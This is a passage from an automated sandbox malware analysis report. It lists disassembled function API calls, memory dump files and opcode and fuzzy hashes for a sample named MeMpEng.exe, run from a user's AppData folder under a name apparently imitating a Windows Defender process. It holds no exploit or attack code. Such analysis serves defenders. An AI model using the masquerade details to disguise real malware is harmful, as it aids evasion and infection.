                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403267,?), ref: 004034F5
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                          • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                          • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                          • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(?,004042CC), ref: 004044FF
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: c966d15b9c294ca5f877954a8561fb6b5762177598d7c32600178bcf5d115e9d
                                                          • Instruction ID: b0a400b6fcb01754b069d8f8c1c9044561b78d1e04efb9d0fff21555a903a89e
                                                          • Opcode Fuzzy Hash: c966d15b9c294ca5f877954a8561fb6b5762177598d7c32600178bcf5d115e9d
                                                          • Instruction Fuzzy Hash: DFA00176444910ABDA02AB50EF0984ABB62FBE5701B519879A286510348B365820FB19
                                                          APIs
                                                            • Part of subcall function 004055D9: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn59E.tmp\System.dll,00000000,0079A700,756F110C,?,?,?,?,?,?,?,?,?,0040341A,00000000,?), ref: 00405611
                                                            • Part of subcall function 004055D9: lstrlenW.KERNEL32(0040341A,Skipped: C:\Users\user\AppData\Local\Temp\nsn59E.tmp\System.dll,00000000,0079A700,756F110C,?,?,?,?,?,?,?,?,?,0040341A,00000000), ref: 00405621
                                                            • Part of subcall function 004055D9: lstrcatW.KERNEL32 ref: 00405634
                                                            • Part of subcall function 004055D9: SetWindowTextW.USER32 ref: 00405646
                                                            • Part of subcall function 004055D9: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
                                                            • Part of subcall function 004055D9: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405686
                                                            • Part of subcall function 004055D9: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694
                                                            • Part of subcall function 00405B37: CreateProcessW.KERNEL32(00000000,007AB800,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?), ref: 00405B60
                                                            • Part of subcall function 00405B37: CloseHandle.KERNEL32(?), ref: 00405B6D
                                                          • CloseHandle.KERNEL32(?), ref: 00402010
                                                            • Part of subcall function 004069F3: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401FC4,?,?,?,?,?,?), ref: 00406A04
                                                            • Part of subcall function 004069F3: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A26
                                                            • Part of subcall function 0040649B: wsprintfW.USER32 ref: 004064A8
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                          • String ID:
                                                          • API String ID: 2972824698-0
                                                          • Opcode ID: 73d48fa51c11560306f2ecb512b72b21235bf248d8e77f8fe192972158bbb83d
                                                          • Instruction ID: 31278e7032d6d459f1869afa1fc16bf8b986fef5f9539014001fbe5517bff4f7
                                                          • Opcode Fuzzy Hash: 73d48fa51c11560306f2ecb512b72b21235bf248d8e77f8fe192972158bbb83d
                                                          • Instruction Fuzzy Hash: 83F09672905511DBDB20BBA59A8999E7664DF0031CF21413FF202B25D5CABC4E41EA6E
                                                          APIs
                                                          • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: b83d77026a0eef837aee2cf9f67490139d75f0ecd08a9ee5abe0a22eb8051c76
                                                          • Instruction ID: e3f6ed4717897a2e6ecee164b05e04455bfe3191319e132c95f7d07364d35911
                                                          • Opcode Fuzzy Hash: b83d77026a0eef837aee2cf9f67490139d75f0ecd08a9ee5abe0a22eb8051c76
                                                          • Instruction Fuzzy Hash: 48D0A773A146008BD744EBB8BE8546F73E8FB903193204C3BD102E10E1E67CC911461C
                                                          APIs
                                                          • GlobalAlloc.KERNELBASE(00000040,?,6A2B12DB,?,6A2B137F,00000019,6A2B11CA,-000000A0), ref: 6A2B12C5
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502855776.000000006A2B1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6A2B0000, based on PE: true
                                                          • Associated: 00000014.00000002.502797249.000000006A2B0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                          • Associated: 00000014.00000002.503249218.000000006A2B4000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                          • Associated: 00000014.00000002.504512768.000000006A2B6000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_6a2b0000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: AllocGlobal
                                                          • String ID:
                                                          • API String ID: 3761449716-0
                                                          • Opcode ID: e94f285739a46dafcf381199e1cc734c03544c8bfabe1c570ead71af54d65d51
                                                          • Instruction ID: bdda78a8d8a9966ea50e17e2d8bcdcf370aae51f79f274e21a387a31fc5fa3ce
                                                          • Opcode Fuzzy Hash: e94f285739a46dafcf381199e1cc734c03544c8bfabe1c570ead71af54d65d51
                                                          • Instruction Fuzzy Hash: 70B012706800009FEE008B14DC4EF3432D4F701308F840400B601C5540C1205C00C524
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404F58
                                                          • GetDlgItem.USER32(?,00000408), ref: 00404F63
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FAD
                                                          • LoadImageW.USER32 ref: 00404FC4
                                                          • SetWindowLongW.USER32 ref: 00404FDD
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF1
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405003
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00405019
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405025
                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405037
                                                          • DeleteObject.GDI32(00000000), ref: 0040503A
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405065
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405071
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510C
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513C
                                                            • Part of subcall function 00404508: SendMessageW.USER32(00000028,?,00000001,00404333), ref: 00404516
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405150
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0040517E
                                                          • SetWindowLongW.USER32 ref: 0040518C
                                                          • ShowWindow.USER32(?,00000005), ref: 0040519C
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405297
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FC
                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405311
                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405335
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405355
                                                          • ImageList_Destroy.COMCTL32(?), ref: 0040536A
                                                          • GlobalFree.KERNEL32(?), ref: 0040537A
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F3
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 0040549C
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AB
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004054D6
                                                          • ShowWindow.USER32(?,00000000), ref: 00405524
                                                          • GetDlgItem.USER32(?,000003FE), ref: 0040552F
                                                          • ShowWindow.USER32(00000000), ref: 00405536
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 2564846305-813528018
                                                          • Opcode ID: 59a12151f687aa456750a72bebcaf03031b6b48c6fd142b985938e878f33cd06
                                                          • Instruction ID: 3f60975f1bbea04172c566a814ac76c3bf8fe72ba7ce1bc18d7d222ec834a39f
                                                          • Opcode Fuzzy Hash: 59a12151f687aa456750a72bebcaf03031b6b48c6fd142b985938e878f33cd06
                                                          • Instruction Fuzzy Hash: B2027870900609AFDF20DF65DC85AAF7BB5FB85314F10816AFA10BA2E1D7798A41CF58
                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404730
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404744
                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404761
                                                          • GetSysColor.USER32 ref: 00404772
                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404780
                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040478E
                                                          • lstrlenW.KERNEL32(?), ref: 00404793
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A0
                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B5
                                                          • GetDlgItem.USER32(?,0000040A), ref: 0040480E
                                                          • SendMessageW.USER32(00000000), ref: 00404815
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404840
                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404883
                                                          • LoadCursorW.USER32 ref: 00404891
                                                          • SetCursor.USER32(00000000), ref: 00404894
                                                          • LoadCursorW.USER32 ref: 004048AD
                                                          • SetCursor.USER32(00000000), ref: 004048B0
                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048DF
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                          • String ID: F@$Call$N
                                                          • API String ID: 3103080414-3713480610
                                                          • Opcode ID: cd157397fad3e9ba876edf76049899dad645a115876cfb537e4ce2c7fc417499
                                                          • Instruction ID: 45fb83ade45cfc86163e6b15eb7062ba83955ff26de70ff6e3d1e782862a206c
                                                          • Opcode Fuzzy Hash: cd157397fad3e9ba876edf76049899dad645a115876cfb537e4ce2c7fc417499
                                                          • Instruction Fuzzy Hash: 1861A2B1900209BFDF10AF60DD85A6A7B69FB85314F00843AF705B62E0C778AD51CFA9
                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000), ref: 004061D5
                                                          • GetShortPathNameW.KERNEL32 ref: 004061DE
                                                            • Part of subcall function 00405FA9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB9
                                                            • Part of subcall function 00405FA9: lstrlenA.KERNEL32(00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEB
                                                          • GetShortPathNameW.KERNEL32 ref: 004061FB
                                                          • wsprintfA.USER32 ref: 00406219
                                                          • GetFileSize.KERNEL32(00000000,00000000,007A55E8,C0000000,00000004,007A55E8,?,?,?,?,?), ref: 00406254
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406263
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629B
                                                          • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A49E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F1
                                                          • GlobalFree.KERNEL32(00000000), ref: 00406302
                                                          • CloseHandle.KERNEL32(00000000), ref: 00406309
                                                            • Part of subcall function 00406044: GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\AppData\Roaming\MeMpEng.exe,80000000,00000003), ref: 00406048
                                                            • Part of subcall function 00406044: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                          • String ID: %ls=%ls$[Rename]$Mz$Uz$Uz
                                                          • API String ID: 2171350718-3350566011
                                                          • Opcode ID: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
                                                          • Instruction ID: b6cadbeacbe634b6bd87c882f2c351c0ea44a21df7cd689b804f2f2a1cba60a5
                                                          • Opcode Fuzzy Hash: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
                                                          • Instruction Fuzzy Hash: 2F313770600715BBD2206B658D49F6B3A5CDF82714F16003EFE02F72D2DA7D982486BD
                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32 ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32 ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextW.USER32(00000000,007A7260,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502236440.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_20_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: 0065e8d55c47ea3cbcda8c109104f1eee6ee8d4d6af800c5cfa02106002edbf4
                                                          • Instruction ID: f4bc5d4286e22692ddece56c15c19c5fca937d6aefcb7484b61e28148d91a738
                                                          • Opcode Fuzzy Hash: 0065e8d55c47ea3cbcda8c109104f1eee6ee8d4d6af800c5cfa02106002edbf4
                                                          • Instruction Fuzzy Hash: 3F418A71804209AFCF058FA5CE459BFBBB9FF45314F00802EF591AA1A0CB389A55DFA4
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404A13
                                                          • SetWindowTextW.USER32 ref: 00404A3D
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404AEE
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404AF9
                                                          • lstrcmpiW.KERNEL32(Call,007A1748,00000000,?,?), ref: 00404B2B
                                                          • lstrcatW.KERNEL32 ref: 00404B37
                                                          • SetDlgItemTextW.USER32 ref: 00404B49
                                                            • Part of subcall function 00405B98: GetDlgItemTextW.USER32 ref: 00405BAB
                                                            • Part of subcall function 00406802: CharNextW.USER32(?), ref: 00406865
                                                            • Part of subcall function 00406802: CharNextW.USER32(?), ref: 00406874
                                                            • Part of subcall function 00406802: CharNextW.USER32(?), ref: 00406879
                                                            • Part of subcall function 00406802: CharPrevW.USER32(?,?), ref: 0040688C
                                                          • GetDiskFreeSpaceW.KERNEL32(0079F718,?,?,0000040F,?,0079F718,0079F718,?,00000001,0079F718,?,?,000003FB,?), ref: 00404C0C
                                                          • MulDiv.KERNEL32 ref: 00404C27
                                                            • Part of subcall function 00404D80: lstrlenW.KERNEL32(007A1748,007A1748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E21
                                                            • Part of subcall function 00404D80: wsprintfW.USER32 ref: 00404E2A
                                                            • Part of subcall function 00404D80: SetDlgItemTextW.USER32 ref: 00404E3D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000014.00000002.502154007.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000014.00000002.502149757.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502158507.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000014.00000002.502162914.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
